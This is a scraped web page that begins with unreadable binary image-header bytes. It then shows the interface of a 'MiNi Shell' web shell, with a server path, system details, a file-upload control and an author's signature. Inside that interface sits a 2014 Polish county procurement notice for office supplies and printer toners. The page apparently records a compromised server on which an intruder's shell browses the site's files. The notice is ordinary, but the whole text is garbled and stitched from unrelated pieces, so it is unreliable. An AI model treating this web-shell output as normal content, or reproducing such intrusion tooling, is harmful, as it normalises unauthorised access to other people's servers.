JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140109/4645-N-2014.html

<p class="kh_header"><b>Brzesko: Dostawa pakietów biurowych i materiałów biurowych w ramach projektu - Bezpośrednie wsparcie rozwoju szkół  poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w Powiecie Brzeskim</b><br>
<b>Numer ogłoszenia: 4645 - 2014; data zamieszczenia: 09.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Brzesku , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbrzeski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pakietów biurowych i materiałów biurowych w ramach projektu - Bezpośrednie wsparcie rozwoju szkół  poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w Powiecie Brzeskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest jednorazowa dostawa pakietów biurowych oraz materiałów biurowych dla biur Szkolnych Organizatorów Rozwoju Edukacji i uczestników sieci współpracy i samokształcenia
2.	Przedmiot zamówienia podzielony został na następujące Zadania (części):
1)	Zadanie Nr 1: Dostawa pakietów biurowych dla uczestników sieci współpracy i samokształcenia
2)	Zadanie Nr 2: Dostawa materiałów biurowych dla biura Szkolnych Organizatorów Rozwoju Edukacji
3.	Realizacja Zadania Nr 1 Dostawa pakietów biurowych dla uczestników sieci współpracy i samokształcenia: obejmuje dostawę 100 szt. pakietów biurowych. W skład każdego jednego pakietu wchodzi: teczka, notes, długopis z nadrukiem.
4.	Realizacja Zadania Nr 2 Dostawa materiałów biurowych dla biura Szkolnych Organizatorów Rozwoju Edukacji obejmuje dostawę:
1)	10 szt. organizerów i długopisów ze wskaźnikiem laserowym zapakowanych w metalowe etui;
2)	10 szt. teczek biurowych;
3)	następujących tonerów do drukarki i urządzeń wielofunkcyjnych:
a)	8 szt. tonerów do urządzenia wielofunkcyjnego Lexmark X734de, kolor czarny;
b)	3 szt. tonerów do urządzenia wielofunkcyjnego Lexmark X734de, kolor żółty;
c)	3 szt. tonerów do urządzenia wielofunkcyjnego Lexmark X734de, kolor niebieski;
d)	3 szt. tonerów do urządzenia wielofunkcyjnego Lexmark X734de, kolor purpurowy;
e)	8 szt. tonerów do drukarki OKI B401dn, kolor czarny
4)	23 szt. druków polecenia wyjazdu służbowego - druk offsetowy;
5)	4 szt. zszywaczy;
6)	10 szt. Bloku do FLIPCHARTU
5.	Szczegółową specyfikację każdego Zadania (części) zawarto w załączniku Nr 2 do niniejszej specyfikacji (Szczegółowy Opis Przedmiotu Zamówienia)
6.	Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji każdej z części niniejszego zamówienia: 
1)	Zamawiający dopuszcza możliwość składania ofert częściowych na ww. zadania (części).
2)	Pakiety biurowe muszą zawierać tylko nowe, nieużywane elementy. 
3)	Pakiety biurowe oraz materiały biurowe Wykonawca musi dostarczyć własnym transportem i na własny koszt do Biura Projektu mieszczącego się w Brzesku przy ul. Piastowskiej 2B oraz wnieść do miejsca wskazanego przez Zamawiającego. Dostawę należy zrealizować w dniach pracy Starostwa Powiatowego w Brzesku, tj. od poniedziałku do piątku w godzinach 7.30-15.30.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 30.19.21.21-5, 30.19.76.00-2, 22.85.00.00-3, 30.12.51.10-5, 30.12.51.20-8, 30.19.73.20-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ne dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.powiatbrzeski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Brzesku Wydział Edukacji (I p, pok. 120) ul. Piastowska 2B 32-800 Brzesko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Brzesku Sekretariat (II p., pok. 213) ul. Głowackiego 51 32-800
Brzesko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 3.5, współfinansowany przez Unię Europejska ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pakietów biurowych dla uczestników sieci współpracy i samokształcenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiał teczki	Wykonana z materiału PP (polipropylen)
Wymiar teczki	Format A4
Właściwości teczki	Min. 10 przegródek na dokumenty, zamykana na zatrzask, na górnym grzbiecie wysuwana rączka do przenoszenia. 
Kolor granatowy.
Notes	notes papierowy A4, min. 60 kartek w linię lub  kratkę 
Długopis z nadrukiem      	wykonany z metalu o długości 120-140mm, średnica korpusu 10mm, wymienny wkład niebieski, mechanizm chowania wkładu.
Nadruk na teczce	Nadruk na przedzie teczki w dolnej części
Wzór: Załącznik  A do SIWZ
Nadruk na długopisie	Nadruk - znakowanie laserem
Wzór: Załącznik A do SIWZ
Ilość pakietów (teczka, notes, długopis)	100 sztuk

Wymagania dodatkowe:
Ewentualne zmiany kolorystyki i rozmiaru logo zawartego w załączniku. Powinny być zgodne z wytycznymi w zakresie promocji projektów POKL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 30.19.76.00-2, 22.85.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów biurowych dla biura Szkolnych Organizatorów Rozwoju Edukacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Organizer i długopis ze wskaźnikiem laserowym
Materiał	Skóra ekologiczna
Kolor	Granatowy
Wymiar	Min. 14,5 cm x 21 cm Max. 21 cm x 29,5 cm
Właściwości	Organizer posiadający miejsce na długopis, kieszonki na wizytówki, karty i dokumenty
Organizer będzie zawierać w sobie spakowane elementy	Tygodniowe kalendarium (kalendarz na rok 2014), zakładkę finansową, zakładkę notes oraz adresownik
Długopis ze wskaźnikiem laserowym        	Długopis metalowy w kolorze srebrnym ze wskaźnikiem laserowym i lampką LED (z bateriami), zapakowany w metalowe etui. Zamawiający wymaga aby długopis pisał w kolorze niebieskim.
Grawer lub nadruk na organizerze 	Grawer lub nadruk na przedzie organizera
Wzór: Załącznik B do SIWZ
Nadruk na etui	Nadruk - znakowanie laserem
Wzór: Załącznik B do SIWZ
Nadruk na długopisie	Nadruk - znakowanie laserem
Wzór: Załącznik B do SIWZ
Ilość pakietów (organizer, długopis ze wskaźnikiem laserowym zapakowany w metalowe etui)	
10

Wymagania dodatkowe:
Ewentualne zmiany kolorystyki i rozmiaru logo zawartego w załączniku. Powinny być zgodne z wytycznymi w zakresie promocji projektów POKL.


3)	Tonery, Druki, Zszywacze, Blok do FLIPCHARTU
Nazwa produktu	j.m.	Ilość
Toner do urządzenia wielofunkcyjnego Lexmark X734de, kolor czarny (wydajność min. 8000 stron)	szt.	8
Toner do urządzenia wielofunkcyjnego Lexmark X734de, kolor żółty (wydajność min. 6000 stron)	szt.	3
Toner do urządzenia wielofunkcyjnego Lexmark X734de, kolor niebieski (wydajność min. 6000 stron)	szt.	3
Toner do urządzenia wielofunkcyjnego Lexmark X734de, kolor purpurowy (wydajność min. 6000 stron)	szt.	3
Toner do drukarki OKI B401dn, kolor czarny  (wydajność min. 2500 stron)	szt.	8
Druki polecenia wyjazdu służbowego - druk offsetowy, 40 kartek, karton offsetowy, format A5	szt.	23
Zszywacz - Wykonany z tworzywa sztucznego, rolkowy mechanizm dociskający zszywki, blokada ramienia zapobiegająca nagłemu zamknięciu, części mechaniczne z metalu, Zintegrowany rozszywacz, zszywanie zamknięte, otwarte, Ładowany od góry, pojemność magazynka 100 x 24/6 lub 140 x 26/6, Zszywa 25-30 kartek, Głębokość wsuwania kartek 50-60mm	

szt.	

4
Blok do FLIPCHARTU - wykonany z papieru offsetowego, gramatura 90 g/m2, wymiary: 65x100cm, 50 kartek/szt	szt. 	10

1.	Zaoferowane tonery powinny być tonerami oryginalnymi, fabrycznie nowymi sygnowanymi przez producenta danego urządzenia. Zamawiający dopuszcza zaoferowanie tonerów równoważnych, czyli fabrycznie nowych a nie sygnowanych przez producenta sprzętu , pod warunkiem, że posiadają one przynajmniej takie same parametry techniczne, jakościowe, funkcjonalne oraz użytkowe jak produkty oryginalne.
2.	Przez użycie słów fabrycznie nowe Zamawiający rozumie tonery, które:
a)	wykonane są z nowych elementów;
b)	nie są regenerowane tj. wszystkie elementy produktu muszą być fabrycznie nowe;
c)	bez śladów uszkodzenia;
d)	 w oryginalnych opakowaniach producenta z widocznym logo, symbolem produktu i terminem przydatności do użytku;
e)	posiadają na opakowaniu indywidualny kod tonera (typ, model) wraz z nazwą urządzenia, do którego jest przeznaczony;
f)	posiadają na produkcie indywidualny kod producenta umożliwiający jednoznaczną identyfikację oraz wszelkie zabezpieczenia stosowane przez producenta np. hologramy czy naklejki identyfikacyjne,
g)	żaden element produktu nie pochodzi z procesu recyklingu;
h)	posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem;
i)	nie były poddawane procesowi ponownego napełniania;
j)	nie powodują uszkodzenia urządzeń, w których będą eksploatowane;
k)	nie powodują utraty gwarancji producenta urządzenia;
l)	nie powodują ograniczeń funkcji i możliwości urządzeń oraz jakości wydruku wyspecyfikowanych w warunkach technicznych producenta urządzeń
3.	Na wszystkie dostarczone tonery Wykonawca udzieli co najmniej 12 miesięcznej gwarancji, chyba że oferowane tonery są oryginalne i gwarancja producenta jest odpowiednio krótsza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 30.19.21.21-5, 22.85.00.00-3, 30.19.76.00-2, 30.12.51.10-5, 30.12.51.20-8, 30.19.73.20-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com